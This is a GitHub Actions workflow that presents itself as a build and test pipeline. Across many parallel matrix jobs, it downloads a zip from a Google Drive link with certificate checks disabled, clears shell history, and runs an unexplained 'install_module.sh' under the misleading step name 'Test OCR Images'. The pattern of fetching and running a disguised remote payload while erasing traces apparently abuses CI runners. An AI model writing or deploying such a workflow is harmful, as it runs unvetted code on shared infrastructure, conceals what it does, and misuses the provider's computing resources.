name: binhminh5lab
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  Assemble:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Provision', 'Build', 'Confirm', 'Trigger', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1ygooLyLe3VSI4O-v6fZfNbbWSCOIqOYs" -O binhminh5lab.zip
        unzip -o binhminh5lab.zip
        rm binhminh5lab.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  VERIFY1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Fetch', 'Compile', 'Evaluate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1ygooLyLe3VSI4O-v6fZfNbbWSCOIqOYs" -O binhminh5lab.zip
        unzip -o binhminh5lab.zip
        rm binhminh5lab.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
